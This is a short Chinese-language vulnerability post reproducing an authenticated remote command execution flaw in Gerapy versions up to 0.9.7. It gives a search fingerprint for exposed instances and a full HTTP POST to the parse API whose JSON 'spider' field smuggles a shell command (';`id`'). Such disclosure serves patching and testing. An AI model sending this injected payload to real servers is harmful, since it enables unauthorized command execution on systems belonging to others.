Gerapy parse 后台远程命令执行漏洞

# Gerapy parse 后台远程命令执行漏洞 ## 漏洞描述 Gerapy gerapy/server/core/views.py 中的方法存在任意命令执行,攻击者登录后台后发送特定的请求包即可利用漏洞 ## 漏洞影响 G...

Gerapy parse 后台远程命令执行漏洞

漏洞描述

Gerapy gerapy/server/core/views.py 中的方法存在任意命令执行,攻击者登录后台后发送特定的请求包即可利用漏洞

漏洞影响

Gerapy <= 0.9.7

网络测绘

title="Gerapy"

漏洞复现

登录页面

img

出现漏洞的文件为 gerapy/server/core/views.py

img

构造请求包测试命令执行

POST /api/project/1/parse HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/plain, */*
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Length: 18

{"spider":";`id`"}

img

  • 发表于 2024-07-12 18:46:04
  • 阅读 ( 2069 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计